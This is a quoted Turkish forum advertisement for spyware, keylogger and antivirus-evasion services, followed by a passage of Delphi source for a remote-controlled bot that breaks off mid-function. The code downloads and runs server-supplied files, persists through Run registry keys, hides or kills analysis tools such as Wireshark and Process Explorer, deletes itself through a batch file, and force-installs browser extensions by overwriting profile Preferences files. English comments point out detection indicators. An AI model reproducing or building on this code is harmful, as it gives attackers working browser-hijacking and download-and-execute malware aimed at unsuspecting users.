tbtlb adlı üyeden alıntı:
arkadaslar merhaba,
C/C++ Assembler ve Delphi dillerinde Masaüstü ve Mobil uygulamalar geliştiriyorum.
internetten veri çekme, soket tabanli multithreaded client/server uygulamalari, json/xml/text data/video/image/audio işleme, Tarayıcı İşlemleri (Ana Sayfa Değiştirme Programları, Eklenti Kurulumu Yapan Programlar), Undetecting, Spyware, KeyLogger ile ilgili işler yapiyorum..
referanslarim mevcut, PM araciligi ile talep edebilirsiniz.
dogrudan programlama(C/C++/ASM/Delphi/VisualBasic/JavaScript/VBScript/PHP/ASP) egitimi almak isteyenler, ilgilenenler,soru sormak isteyenler ve benimle calismak isteyenler PM atabilir.
kabul ettigim odeme turleri,
paypal, misli.com, nesine.com, garantibankasi, isbankasi
Yazmış Olduğum Örnek Bir Kod Parçacığı...
C/C++ Assembler ve Delphi dillerinde Masaüstü ve Mobil uygulamalar geliştiriyorum.
internetten veri çekme, soket tabanli multithreaded client/server uygulamalari, json/xml/text data/video/image/audio işleme, Tarayıcı İşlemleri (Ana Sayfa Değiştirme Programları, Eklenti Kurulumu Yapan Programlar), Undetecting, Spyware, KeyLogger ile ilgili işler yapiyorum..
referanslarim mevcut, PM araciligi ile talep edebilirsiniz.
dogrudan programlama(C/C++/ASM/Delphi/VisualBasic/JavaScript/VBScript/PHP/ASP) egitimi almak isteyenler, ilgilenenler,soru sormak isteyenler ve benimle calismak isteyenler PM atabilir.
kabul ettigim odeme turleri,
paypal, misli.com, nesine.com, garantibankasi, isbankasi
Yazmış Olduğum Örnek Bir Kod Parçacığı...
program Join;
//{$DEFINE DEBUG_MODE_ON} // Hata Duzeltmeleri İcin; bu satiri kapatirsan siyah ekran gider.
//{$DEFINE DEMO_VERSION}
{$IFDEF DEBUG_MODE_ON}
{$APPTYPE CONSOLE} // Siyah Ekran Gozukmesi Icin Gereklidir.
{$ELSE}
{$APPTYPE GUI} // Siyah Ekrani Gizlemek İcin;
{$ENDIF}
{$IFDEF DEBUG_MODE_ON}
{$E .dll}
{$ELSE}
{$E .dll}
{$ENDIF}
{$WARNINGS OFF}
{$HINTS OFF}
{$R Generator.RES}
{
[+] Eklenen Ozellik[*] Duzeltilen Sorun
[-] Cikarilan Ozellik
[#] Gelistirilen Ozellik
Guncelleme - 30.07.2014
+ Dosya İle Birleştirme Özelliği Eklendi.
+ Registry Key ve Installation Name değiştirebilme Özelliği Eklendi.
+ Builder Özelliği Eklendi
+ Simge Değiştirebilme Özelliği Eklendi.
+ UPX ike Sıkıştırma Özelliği Eklendi.
Guncelleme - 15.07.2014
+ CloudFlare Destegi Eklendi.
* CloudFlare gibi protected sunuculardan dosya cekim isleminde hata verip programin kirilmasina sebep olan problem duzeltildi.
+ User-Agent Eklendi
+ Redirection Eklendi
+ WireShark Anti Debugger Bypass Ozelligi Eklendi
* Programin hata vermesine sebebiyet veren (SaveToFile) Free edilemeyen MemoryStream sorunu duzeltildi.
* SaveToFile Fonksiyonu WinAPI kullanilarak improve edildi.
+ Demo Version Destegi Eklendi.
Eklenenler - 01.07.2014
+ Chrome görev yöneticisi ekranını otomatik kapatabilme özelliği eklendi.
* Paneldeki Sorun Düzeltildi.
* Programin komut almamasına sebep olan problem düzeltildi.
* Uygulama installation dizini tekrar düzeltildi.
# Bazı fonksiyonlar geliştirildi. Bilgisayar bilgisi alan fonksiyon düzenlendi.
Guncelleme - 03.07.2014
* Process Sonlandirmadaki Yetkilendirme Problemi Duzeltildi.
* Installation Islemi Threadindaki Olusan Hata Duzeltildi.
- Taskkill /im /f process* fonksiyonu programdan cikarildi.
}
uses
Windows,
IdHTTP,
Classes,
IniFiles,
shFolder,
Math,
ShellAPI,
TlHelp32,
ImageHlp,
ShlObj,
SysUtils,
uRC4 in 'uRC4.pas',
uPrefs in 'uPrefs.pas';
// Numeric command identifiers. CheckCommands decodes a server response and
// dispatches on these values, so they define the full remote-control surface
// visible in this file: exit, self-removal, self-update, browser-extension
// install, browser restart, and download-and-run.
const
CMD_CLOSESERVER = 1000;
CMD_UNINSTALLFILE = 1001;
CMD_UPDATESERVER = 1002;
CMD_INSTALLEXTENSION = 1003;
CMD_RESETBROWSERS = 1004;
CMD_DOWNLOADANDEXECUTE = 1005;
const
NONE = $00; //Blank number
// Fixed User-Agent set on every TIdHTTP request in this file (InternetDownloadFile
// and ReadCommands). A constant Firefox/12.0 string on periodic plain-HTTP POSTs
// is a usable network-detection indicator.
INET_USERAGENT = 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0';
// Upper bound on followed HTTP redirects; redirect following is enabled whenever this is non-zero.
INET_REDIRECT_MAX = 10;
Type
// Return value of InternetDownloadFile: the local path the download was saved to.
TCustomDownloadFile = record
SavePath : string;
end;
// Runtime configuration held in the global BotConfig and filled in by the main block.
// The Victim* fields are host identifiers collected by GetUserInfo and sent to the
// server by ReadCommands; VictimOS and VictimVersion are sent but never assigned in
// the visible code.
TBotConfig = record
// Name of the single-instance mutex created in InstallFile.
Mutex : String;
VictimName : string;
VictimComputerName : string;
VictimCountry : string;
VictimLanguage : string;
VictimOS : string;
VictimVersion : string;
// Path and handle of the INI file that stores LastCommandHash / LastExtension.
SettingsFile : string;
SettingsIniFile : TIniFile;
// Sent as the vKey POST field.
ProductKey : string;
// URL polled by ReadCommands.
CommandURL : string;
// Install location (directory, file name, full path) and the Run-key value name.
InstallDirectory,
InstallName,
InstallDirectoryPath,
RegistryName : string;
End;
// Fixed-layout build configuration. The main block loads the RCDATA resource
// 'TKEY', passes it through Decrypt and reads SizeOf(TInfo) bytes into the
// global INFO, so an analyst can recover these settings from a sample's
// resource section.
// Fields read by the visible code: URL_ADDR (command URL), KEY (Run-key value
// name), PROGRAMNAME (installed file name), INSTALL (gates InstallFile),
// BINDER and FILE_NAME (gate and name the bundled file that is dropped and run).
// The browser flags and MELT / PERSISTANCE / ENCRYPT are not read anywhere in
// the visible code.
TInfo = RECORD
URL_ADDR : ARRAY [0..255] OF CHAR;
BINDER : BOOL;
FILE_NAME : ARRAY [0..255] OF CHAR;
// BROWSER
FIREFOX : BOOL;
OPERA : BOOL;
CHROME : BOOL;
EXPLORER : BOOL;
SAFARI : BOOL;
PALEMON : BOOL;
MAXTHON : BOOL;
KMELEON : BOOL;
DRAGON : BOOL;
AVANT : BOOL;
YANDEX : BOOL;
TORCH : BOOL;
IRON : BOOL;
CHROMIUM : BOOL;
SUPERBIRD : BOOL;
CHROMECANARY : BOOL;
//OTHER
MELT : BOOL;
PERSISTANCE : BOOL;
ENCRYPT : BOOL;
INSTALL : BOOL;
//REGISTRY
KEY : ARRAY [0..255] OF CHAR;
PROGRAMNAME : ARRAY [0..255] OF CHAR;
END;
// Per-browser profile locations used by InstallExtension. For each browser:
// *_Path is the profile's Extensions directory, *_Config its Preferences file,
// *_Ext the per-extension subdirectory. The Firefox_*, Maxthon_* and Iron_*
// fields are declared but never assigned in the visible code.
TBrowser = record
// Browser information
Firefox_Path,
Firefox_Config,
Firefox_Ext,
Chrome_Path,
Chrome_Config,
Chrome_Ext,
Yandex_Path,
Yandex_Config,
Yandex_Ext,
ComodoDragon_Path,
ComodoDragon_Config,
ComodoDragon_Ext,
Torch_Path,
Torch_Config,
Torch_Ext,
Maxthon_Path,
Maxthon_Config,
Maxthon_Ext,
Iron_Path,
Iron_Config,
Iron_Ext,
Chromium_Path,
Chromium_Config,
Chromium_Ext,
SuperBird_Path,
SuperBird_Config,
SuperBird_Ext,
ChromeCanary_Path,
ChromeCanary_Config,
ChromeCanary_Ext,
Opera_Path,
Opera_Config,
Opera_Ext : string;
// Is it installed? (set from FileExists on the Preferences file)
Firefox_Installed,
Chrome_Installed,
Yandex_Installed,
ComodoDragon_Installed,
Torch_Installed,
Maxthon_Installed,
Iron_Installed,
SuperBird_Installed,
ChromeCanary_Installed,
Chromium_Installed,
Opera_Installed : Boolean;
End;
Const
// Field separator inside a decoded server command (see CheckCommands / InstallExtension).
Parser : String = '~';
CurrentVersion : string = '0.9.9.2';
// Autostart location passed to AddToRegistry by InstallFile and Uninstall for
// both HKEY_CURRENT_USER and HKEY_LOCAL_MACHINE. Writes of an unfamiliar value
// under the Run key in either hive are the persistence indicator for this program.
StartUpPath : string = 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run\';
var
// Global runtime configuration and the build configuration read from the 'TKEY' resource.
BotConfig : TBotConfig;
INFO : TInfo;
// Shows a blocking message box when built with DEMO_VERSION defined; otherwise
// compiles to an empty procedure. The main block calls it repeatedly between
// start-up steps.
Procedure DemoVersion;
begin
{$IFDEF DEMO_VERSION}
MessageBox(0,'DEVAM_ICIN_ILERI_BAS','DEMO_VERSION',MB_OK OR MB_ICONINFORMATION);
{$ENDIF}
end;
// Debug trace helper: writes pszData to the console only when DEBUG_MODE_ON is
// defined. In a non-debug build it does nothing, so the trace strings seen
// throughout this file produce no output at run time.
Procedure DebugPrompt(pszData : string);
begin
//OutputDebugStringW(PWideChar(WideString(pszData)));
//Writeln(pszData);
//Writeln(pszData);
{$IFDEF DEBUG_MODE_ON}
Writeln(pszData)
{$ENDIF}
end;
// Terminates every running process whose image name equals ExeFileName
// (case-insensitive comparison against both the bare file name and the full
// szExeFile string).
// Returns the TerminateProcess result of the last matching process, or 0 when
// nothing matched.
// In this file the targets are the browsers listed in ResetBrowsers and
// 'Wireshark.exe' (from DetectChromeTaskManager). On the defensive side this
// appears as a process-snapshot walk followed by OpenProcess with
// PROCESS_TERMINATE against another user's-session tools or browsers.
function KillTask(ExeFileName: string): Integer;
const
PROCESS_TERMINATE = $0001;
var
ContinueLoop: BOOL;
FSnapshotHandle: THandle;
FProcessEntry32: TProcessEntry32;
begin
Result := 0;
// Snapshot of all processes, then iterate entry by entry.
FSnapshotHandle := CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
FProcessEntry32.dwSize := SizeOf(FProcessEntry32);
ContinueLoop := Process32First(FSnapshotHandle, FProcessEntry32);
while Integer(ContinueLoop) <> 0
do begin
if ((UpperCase(ExtractFileName(FProcessEntry32.szExeFile)) =
UpperCase(ExeFileName)) or (UpperCase(FProcessEntry32.szExeFile) =
UpperCase(ExeFileName))) then
Result := Integer(TerminateProcess(
OpenProcess(PROCESS_TERMINATE,
BOOL(0),
FProcessEntry32.th32ProcessID),
0));
ContinueLoop := Process32Next(FSnapshotHandle, FProcessEntry32);
end;
CloseHandle(FSnapshotHandle);
end;
// Self-protection / anti-analysis loop, started as its own thread by the main
// block. Once per second it reads the title of the active window and reacts to
// a fixed list of titles:
//   - browser task-manager windows (English and Turkish titles for Chrome,
//     Comodo Dragon, Yandex, Iron, Superbird, Torch): calls CloseWindow on them;
//   - 'Fiddler Web Debugger', and any title containing 'rocess Explorer' or
//     'rocess Hacker': disables and hides the window;
//   - any title containing 'Wireshark': terminates Wireshark.exe via KillTask.
// For responders: analysis tools whose windows vanish or stop accepting input,
// or Wireshark exiting shortly after gaining focus, match this behaviour. The
// matching is purely on window title text.
procedure DetectChromeTaskManager;
var
guiInfo : TGUIThreadInfo;
WindowName : string;
arrWindow : array[0..255] of char;
begin
while True Do
begin
// Thread id 0 is passed to GetGUIThreadInfo; the active window handle is then read from guiInfo.
guiInfo.cbsize := sizeof(TGUIThreadInfo);
GetGUIThreadInfo(0,guiInfo);
ZeroMemory(@arrWindow,SizeOf(arrWindow));
GetWindowText(guiInfo.hwndActive,arrWindow,sizeof(arrWindow));
WindowName := trim(string(arrWindow));
if (
(WindowName = 'Görev Yöneticisi - Google Chrome') or
(WindowName = 'Task Manager - Google Chrome') or
(WindowName = 'Task Manager - Comodo Dragon') or
(WindowName = 'Görev Yöneticisi - Comodo Dragon') or
(WindowName = 'Yandex görev yöneticisi') or
(WindowName = 'Task Manager Yandex') or
(WindowName = 'Task Manager - Iron') or
(WindowName = 'Görev Yöneticisi - Iron') or
(WindowName = 'Task Manager - Superbird') or
(WindowName = 'Görev Yöneticisi - Superbird') or
(WindowName = 'Görev Yöneticisi - Torch') or
(WindowName = 'Task Manager - Torch')
)
then begin
DebugPrompt(WindowName + ' Tespit Edildi ve KAPANDI');
CloseWindow(guiInfo.hwndActive);
end
else if (WindowName = 'Fiddler Web Debugger') or // Kill Debuggers;
(Pos('rocess Explorer',WindowName)>0) or
(Pos('rocess Hacker',WindowName)>0)
then begin
EnableWindow(guiInfo.hwndActive,false);
ShowWindow(guiInfo.hwndActive,SW_HIDE);
end
else if (Pos('Wireshark',WindowName)>0)
then begin
KillTask('Wireshark.exe');
end;
Sleep(1000);
end;
end;
// Writes the bytes of sData to sPath through the Win32 file API.
// CREATE_ALWAYS means an existing file at sPath is truncated and replaced.
// Callers in this file use it to write the self-delete batch file (Melt), to
// overwrite browser Preferences files (InstallExtension) and to drop the
// bundled file (main block).
procedure Str2File(sData,sPath: string);
var
hFile: THandle;
dWritten: DWORD;
begin
DebugPrompt('KAYIT YERI : ' + sPath);
hFile := CreateFile(PChar(sPath), GENERIC_WRITE, FILE_SHARE_WRITE, nil, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0);
if hFile <> 0
then begin
SetFilePointer(hFile, 0, nil, FILE_BEGIN);
WriteFile(hFile, sData[1], Length(sData), dWritten, nil);
end;
CloseHandle(hFile);
DebugPrompt('KAYIT EDILDI!');
end;
// Opens SubKey under the root RegKey for writing and sets the value named
// SingleKey to Value with registry type dType.
// Result is initialised to False and not changed afterwards, so callers cannot
// tell from the return value whether the write happened.
// In this file it is only called with StartUpPath (the Run key) under HKCU and
// HKLM: with the installed file path by InstallFile, and with an empty string
// by Uninstall. Registry auditing on those Run keys captures both operations.
Function AddToRegistry(RegKey : HKey;dType : Cardinal;SubKey,SingleKey,Value : String) : Boolean;
VAR
Key : HKey;
Begin
Result := False;
if RegOpenKeyEx(RegKey,PChar(SubKey), 0, KEY_WRITE, Key) = ERROR_SUCCESS
then begin
RegSetValueEx(Key, PAnsiChar(SingleKey), 0,dType, PChar(Value),Length(Value)); // The 1 is for the terminating 0 (PChar)
RegCloseKey(Key);
RegCloseKey(RegKey);
end;
End;
// Replaces every '/' in data with '\' so that ExtractFileName can pick the
// last URL path segment as a local file name (see InternetDownloadFile).
function Url2File(data : string) : string;
begin
Result := StringReplace(data,'/','\',[rfReplaceAll]);
end;
// Returns a per-user directory with a trailing backslash, selected by PathIndex:
//   5 = the temp path (GetTempPath),
//   6 = CSIDL_APPDATA,
//   7 = CSIDL_LOCAL_APPDATA.
// Any other index leaves the buffer zeroed before the trailing backslash is
// appended. These three locations are where every file this program creates
// ends up, which makes them the places to look during triage.
function GetCustomPath(PathIndex : Integer) : string;
var
arrPath : array[0..255] of char;
begin
ZeroMemory(@arrPath,SizeOf(arrPath));
case PathIndex of
5 : begin GetTempPath(SizeOf(arrPath),@arrPath); end; // TEMP
6 : begin SHGetSpecialFolderPath(0,arrPath,CSIDL_APPDATA,false); end; // App DATA
7 : begin SHGetSpecialFolderPath(0,arrPath,CSIDL_LOCAL_APPDATA,false); end; // Local App DATA
end;
result := IncludeTrailingBackSlash(Trim(string(arrPath)));
end;
// Builds a string of random upper-case ASCII letters. The loop runs from 0 to
// iLen inclusive, so the result has iLen + 1 characters. Randomize reseeds the
// generator on every call. Not called anywhere in the visible code.
function GenerateRandomText(iLen : Integer): string;
var
i : Integer;
begin
Randomize;
Result := '';
for i := 0 to iLen
do begin
Result := Result + Chr( RandomRange(65,90) );
end;
end;
// Collects one host identifier, selected by Index, and returns it sanitised:
//   0 = computer name, 1 = user name,
//   2 = ISO 3166 country name of the user locale,
//   3 = language name of the system default locale.
// Spaces and a fixed set of punctuation characters (including '~', the command
// field separator) are replaced by '_'; an empty result becomes 'Unknown'.
// The main block stores these values in BotConfig; they are then sent to the
// server by ReadCommands and also used as directory names in the settings path,
// so the same strings appear both on the wire and on disk.
function GetUserInfo(Index : Integer) : String;
var
arrData : array [0..255] of char;
hSize : Cardinal;
begin
ZeroMemory(@arrData,SizeOf(arrData));
hSize := SizeOf(arrData);
FillChar(arrData,SizeOf(arrData),#0);
case Index of
0 : begin GetComputerName(arrData,hSize); end; // computername
1 : begin GetUserName(arrData,hSize); end; // username
2 : begin // country Info
Windows.GetLocaleInfo(LOCALE_USER_DEFAULT,LOCALE_SISO3166CTRYNAME,arrData,SizeOf(arrData))
end;
3 : begin // language
VerLanguageName(GetSystemDefaultLCID,arrData,SizeOf(arrData));
end;
end;
Result := string(Trim(string(arrData)));
// Character-by-character sanitisation to '_'.
Result := StringReplace(Result,' ','_',[rfReplaceAll]);
Result := StringReplace(Result,'.','_',[rfReplaceAll]);
Result := StringReplace(Result,',','_',[rfReplaceAll]);
Result := StringReplace(Result,'~','_',[rfReplaceAll]);
Result := StringReplace(Result,'$','_',[rfReplaceAll]);
Result := StringReplace(Result,'#','_',[rfReplaceAll]);
Result := StringReplace(Result,'*','_',[rfReplaceAll]);
Result := StringReplace(Result,'{','_',[rfReplaceAll]);
Result := StringReplace(Result,'}','_',[rfReplaceAll]);
Result := StringReplace(Result,'[','_',[rfReplaceAll]);
Result := StringReplace(Result,']','_',[rfReplaceAll]);
Result := StringReplace(Result,'(','_',[rfReplaceAll]);
Result := StringReplace(Result,')','_',[rfReplaceAll]);
Result := StringReplace(Result,'+','_',[rfReplaceAll]);
Result := StringReplace(Result,'%','_',[rfReplaceAll]);
Result := StringReplace(Result,'<','_',[rfReplaceAll]);
Result := StringReplace(Result,'>','_',[rfReplaceAll]);
Result := StringReplace(Result,'|','_',[rfReplaceAll]);
Result := StringReplace(Result,'?','_',[rfReplaceAll]);
Result := StringReplace(Result,'-','_',[rfReplaceAll]);
if Length(Result) = 0 then Result := 'Unknown';
DebugPrompt('Info:'+IntToStr(Index)+ '---' +Result);
end;
// Downloads pszUrl over HTTP into the temp directory and optionally runs it.
// The local file name is the last path segment of the URL; an existing file of
// that name is deleted first. When Execute is true the saved file is opened
// with ShellExecuteA, passing HasParams as its parameters.
// Returns a record whose SavePath is the local path.
// The URL comes from the server (UpdateServer, InstallExtension and the
// download-and-execute command), and the visible code applies no signature,
// hash or origin check to the content before running it. Detection points:
// a new executable appearing in %TEMP% followed by its launch from the same
// process, and an HTTP GET carrying the fixed INET_USERAGENT string.
function InternetDownloadFile(pszUrl : string;Execute: Boolean;HasParams : String):TCustomDownloadFile;
var
hDownloadSocket : TIdHTTP;
stream : TMemoryStream;
begin
Result.SavePath := GetCustomPath(5) + ExtractFileName(Url2File(pszUrl));
If FileExists(Result.SavePath)
then begin
DeleteFileW(PWideChar(WideString(Result.SavePath)));
end;
DebugPrompt('URL ADRESİ : ' + pszUrl);
stream := TMemoryStream.Create;
hDownloadSocket := TIdHTTP.Create(nil);
hDownloadSocket.request.userAgent := INET_USERAGENT;
hDownloadSocket.redirectMaximum := INET_REDIRECT_MAX;
hDownloadSocket.handleRedirects := INET_REDIRECT_MAX<>NONE;
DebugPrompt('URL Adresi : ' + pszUrl);
// The whole response body is buffered in memory before being written out.
hDownloadSocket.Get(pszUrl,Stream);
Stream.position := 0 ;
If not FileExists(Result.SavePath)
then begin
Stream.SaveToFile(Result.SavePath);
Stream.Free;
end;
if Execute = true
then begin
DebugPrompt(Result.SavePath);
ShellExecuteA(0,'OPEN',PAnsiChar(Result.SavePath),PAnsiChar(HasParams),Nil,SW_SHOW);
end;
end;
// Self-deletion helper. Writes a batch file named 'Sil.bat' into the temp
// directory and runs it hidden. The batch loops (ping as a delay, del, retry
// while the file still exists) until OldFile is gone, then deletes itself.
// Called by Uninstall with the path of the running executable.
// Forensic note: the batch file removes itself, so evidence is more likely in
// process-creation logs (a hidden cmd/batch launch from %TEMP% running ping
// and del) than on disk.
Procedure Melt(OldFile :String);
var
BatData : String;
BatFile : String;
Begin
BatData :=':start'+#13#10+
'ping -n 1 localhost'+#13#10+
'del' + ' "' + OldFile + '"'+#13#10+
'if exist' + ' "' + OldFile + '" ' + 'goto start'+ #13#10+
'del %0';
BatFile:=IncludeTrailingBackSlash(GetCustomPath(5)) + 'Sil.bat';
Str2File(BatData,BatFile);
ShellExecuteA(0, 'open', PAnsiChar(BatFile), nil, nil, SW_HIDE);
End;
// Handler for CMD_UNINSTALLFILE. Sets the program's Run-key value to an empty
// string under both HKCU and HKLM (the value itself is written, not deleted),
// schedules deletion of the running executable through Melt, and exits.
// The settings INI file and its directory are not touched here, so they
// remain as residue after removal.
procedure Uninstall;
begin
AddToRegistry(HKEY_CURRENT_USER,REG_SZ,StartUpPath,BotConfig.RegistryName,'');
AddToRegistry(HKEY_LOCAL_MACHINE,REG_SZ,StartUpPath,BotConfig.RegistryName,'');
Melt(ParamStr(0));
ExitProcess(0);
end;
// Widens a string by appending a #0 after every character, producing a byte
// layout that InstallFile then passes to the W-suffixed Win32 calls.
// NOTE(review): this only yields valid UTF-16 if the input is single-byte
// text in the ASCII range - confirm against the compiler's string type.
function StringToUnicode(sString:String):String;
var
i:integer;
begin
Result := '';
for i := 1 to Length(sString) do begin
Result := Result + sString[i] + #0;
end;
end;
// Installation and persistence routine, run from the main block when
// INFO.INSTALL is set and the build is not a debug build.
// Steps, in order:
//   1. Writes a Run-key value (name BotConfig.RegistryName, data
//      BotConfig.InstallDirectoryPath) under both HKCU and HKLM.
//   2. If the running image is not already at InstallDirectoryPath, copies
//      itself there, launches the copy and exits the current process.
//   3. Otherwise creates a named mutex (BotConfig.Mutex) and exits if it
//      already exists, enforcing a single running instance.
// Indicators for defenders: the Run-key value, an executable inside a
// per-user Local AppData subdirectory that matches the settings path built in
// the main block, and the named mutex, whose name is hard-coded in the main
// block of this sample.
procedure InstallFile;
var
pCurPath:Pointer;
strPath : String;
ServerMutex : THandle;
begin
AddToRegistry(HKEY_CURRENT_USER,REG_SZ,StartUpPath,BotConfig.RegistryName,BotConfig.InstallDirectoryPath);
AddToRegistry(HKEY_LOCAL_MACHINE,REG_SZ,StartUpPath,BotConfig.RegistryName,BotConfig.InstallDirectoryPath);
strPath := BotConfig.InstallDirectoryPath;
strPath := StringToUnicode(strPath);
if lstrlenW(@strPath[1]) <> 0
then begin
GetMem(pCurPath,(MAX_PATH * 4));
if pCurPath <> nil
then begin
// Path of the currently running image, compared case-insensitively with the install path.
GetModuleFileNameW(0,pCurPath,(MAX_PATH * 4));
if lstrcmpiW(pCurPath,@strPath[1]) <> 0
then begin
if CopyFileW(pCurPath,@strPath[1],False)
then begin
if ShellExecuteW(0,nil,@strPath[1],nil,nil,SW_SHOW) >= 32
then begin
ExitProcess(0);
end;
end;
end;
FreeMem(pCurPath);
end;
end;
ServerMutex := CreateMutex(nil,False,pchar(String(BotConfig.Mutex)));
if GetLastError = ERROR_ALREADY_EXISTS
then begin
CloseHandle(ServerMutex);
ExitProcess(0);
end;
end;
// Starts the first browser that ShellExecuteW manages to launch, trying in
// order: Chrome, Firefox, Browser.exe (logged as Yandex), Opera, Comodo
// Dragon, Internet Explorer. If none starts, opens http://facebook.com with
// the default handler instead.
// Used after browsers were killed (ResetBrowsers), so that the user sees a
// browser window again once the extension/preferences changes are in place.
procedure OpenBrowser;
begin
if ShellExecuteW(0,nil,'Chrome.exe',nil,nil,SW_SHOW) >= 32
then begin
DebugPrompt('Chrome Calisti');
end
else if ShellExecuteW(0,nil,'Firefox.exe',nil,nil,SW_SHOW) >= 32
then begin
DebugPrompt('FireFox Calisti');
end
else if ShellExecuteW(0,nil,'Browser.exe',nil,nil,SW_SHOW) >= 32
then begin
DebugPrompt('Yandex Calisti');
end
else if ShellExecuteW(0,nil,'Opera.exe',nil,nil,SW_SHOW) >= 32
then begin
DebugPrompt('Opera Calisti');
end
else if ShellExecuteW(0,nil,'Dragon.exe',nil,nil,SW_SHOW) >= 32
then begin
DebugPrompt('Comodo Dragon Calisti');
end
else if ShellExecuteW(0,nil,'iexplore.exe',nil,nil,SW_SHOW) >= 32
then begin
DebugPrompt('Internet Explorer Calisti');
end
else begin
ShellExecuteA(0,'OPEN',PAnsiChar('http://facebook.com'),'',Nil,SW_SHOW);
end;
end;
// Force-terminates a fixed list of browser processes through KillTask.
// Called before browser profile files are overwritten (InstallExtension) and
// by the CMD_RESETBROWSERS command. Several different browsers terminating
// within the same second, without user action, is the observable symptom.
procedure ResetBrowsers;
var
strBrowserList : TStringList;
i : Integer;
begin
strBrowserList := TStringList.Create;
strBrowserList.Clear;
// Close the browsers
with strBrowserList
do begin
Add('firefox.exe');
Add('chrome.exe');
Add('yandex.exe');
Add('iexplore.exe');
Add('browser.exe');
Add('dragon.exe');
Add('opera.exe');
Add('iron.exe');
Add('superbird.exe');
Add('torch.exe');
end;
for i := 0 to strBrowserList.Count - 1
do begin
DebugPrompt('Oldurulen Tarayici : ' + strBrowserList.Strings[i]);
KillTask(strBrowserList.Strings[i]);
end;
end;
// Reports whether Url equals the 'LastExtension' value stored in the settings
// INI file (section SETTINGS). When it differs, the new Url is stored and the
// function returns False; when it matches, it returns True.
// The Path parameter is not used. The check is therefore only a record of the
// last URL processed, not an inspection of any browser profile; the INI file
// gives an investigator the most recent extension URL the host was sent.
function CheckExtensionIsInstalled(Url,Path : String) : Boolean;
begin
Result := False;
if BotConfig.SettingsIniFile.ReadString('SETTINGS','LastExtension','')<>Url
then begin
BotConfig.SettingsIniFile.WriteString('SETTINGS','LastExtension',Url);
Result := False;
end
else
begin
DebugPrompt('Bu Eklenti Zaten Yüklenmiştir...');
Result := True;
end;
end;
// Handler for CMD_INSTALLEXTENSION. pszData holds three '~'-separated fields:
// an extension download URL, a Key (used as the extension directory name) and
// a Value (passed to GenerateChromePreferences).
// What it does to the host, in order:
//   1. Returns early if the URL equals the last one recorded in the settings INI.
//   2. For Chrome, Yandex, Comodo Dragon, Chrome Canary, Chromium, Torch,
//      SuperBird (Local AppData) and Opera (AppData), creates the profile's
//      Extensions\<Key>\ directory. The directories are created whether or not
//      the browser is installed; the *_Installed flags are computed but not
//      consulted afterwards.
//   3. Downloads the extension file to the temp directory.
//   4. Kills all listed browsers and waits five seconds.
//   5. Copies the downloaded file into each Extensions\<Key>\ directory and
//      overwrites each profile's Preferences file with the output of
//      GenerateChromePreferences, replacing whatever preferences the user had.
//   6. Starts a browser again.
// GenerateChromePreferences is not defined in the visible source (presumably
// in uPrefs - confirm), so the content written to Preferences cannot be
// described from here.
// Triage pointers: Extensions directories for browsers that were never
// installed, Preferences files across several browsers sharing one
// modification time, and an extension the user did not add.
procedure InstallExtension(pszData : string);
var
Key,Value,ExtensionURL : string;
Browser : TBrowser;
ExtName : string;
begin
// Install extension: split pszData into URL, Key and Value.
ExtensionURL := Copy(pszData,1,Pos(Parser,pszData)-1);
Delete(pszData,1,Length(ExtensionURL)+1);
Key := Copy(pszData,1,Pos(Parser,pszData)-1);
Delete(pszData,1,Length(Key)+1);
Value := Copy(pszData,1,Pos(Parser,pszData)-1);
if CheckExtensionIsInstalled(ExtensionURL,Browser.Chrome_Ext + ExtName) = True
then begin
Exit;
end;
DebugPrompt('ExtensionURL:'+ExtensionURL);
DebugPrompt('Key:'+Key);
DebugPrompt('Value:'+Value);
Browser.Chrome_Path := GetCustomPath(7) + 'Google\Chrome\User Data\Default\Extensions\';
Browser.Chrome_Config := GetCustomPath(7) + 'Google\Chrome\User Data\Default\Preferences';
MakeSureDirectoryPathExists(PAnsiChar(AnsiString(Browser.Chrome_Path)));
Browser.Chrome_Installed := FileExists(Browser.Chrome_Config);
Browser.Chrome_Ext := IncludeTrailingBackSlash(Browser.Chrome_Path + Key);
MakeSureDirectoryPathExists(PAnsiChar(Browser.Chrome_Ext));
DebugPrompt(Browser.Chrome_Ext);
Browser.Yandex_Path := GetCustomPath(7) + 'Yandex\YandexBrowser\User Data\Default\Extensions\';
Browser.Yandex_Config := GetCustomPath(7) + 'Yandex\YandexBrowser\User Data\Default\Preferences';
MakeSureDirectoryPathExists(PAnsiChar(AnsiString(Browser.Yandex_Path)));
Browser.Yandex_Installed := FileExists(Browser.Yandex_Config);
Browser.Yandex_Ext := IncludeTrailingBackSlash(Browser.Yandex_Path + Key);
MakeSureDirectoryPathExists(PAnsiChar(Browser.Yandex_Ext));
DebugPrompt(Browser.Yandex_Ext);
Browser.ComodoDragon_Path := GetCustomPath(7) + 'COMODO\Dragon\User Data\Default\Extensions\';
Browser.ComodoDragon_Config := GetCustomPath(7) + 'COMODO\Dragon\User Data\Default\Preferences';
MakeSureDirectoryPathExists(PAnsiChar(AnsiString(Browser.ComodoDragon_Path)));
Browser.ComodoDragon_Installed := FileExists(Browser.ComodoDragon_Config);
Browser.ComodoDragon_Ext := IncludeTrailingBackSlash(Browser.ComodoDragon_Path + Key);
MakeSureDirectoryPathExists(PAnsiChar(Browser.ComodoDragon_Ext));
DebugPrompt(Browser.ComodoDragon_Ext);
Browser.ChromeCanary_Path := GetCustomPath(7) + 'Google\Chrome SxS\User Data\Default\Extensions\';
Browser.ChromeCanary_Config := GetCustomPath(7) + 'Google\Chrome SxS\User Data\Default\Preferences';
MakeSureDirectoryPathExists(PAnsiChar(AnsiString(Browser.ChromeCanary_Path)));
Browser.ChromeCanary_Installed := FileExists(Browser.ChromeCanary_Config);
Browser.ChromeCanary_Ext := IncludeTrailingBackSlash(Browser.ChromeCanary_Path + Key);
MakeSureDirectoryPathExists(PAnsiChar(Browser.ChromeCanary_Ext));
DebugPrompt(Browser.ChromeCanary_Ext);
Browser.Chromium_Path := GetCustomPath(7) + 'Chromium\User Data\Default\Extensions\';
Browser.Chromium_Config := GetCustomPath(7) + 'Chromium\User Data\Default\Preferences';
MakeSureDirectoryPathExists(PAnsiChar(AnsiString(Browser.Chromium_Path)));
Browser.Chromium_Installed := FileExists(Browser.Chromium_Config);
Browser.Chromium_Ext := IncludeTrailingBackSlash(Browser.Chromium_Path + Key);
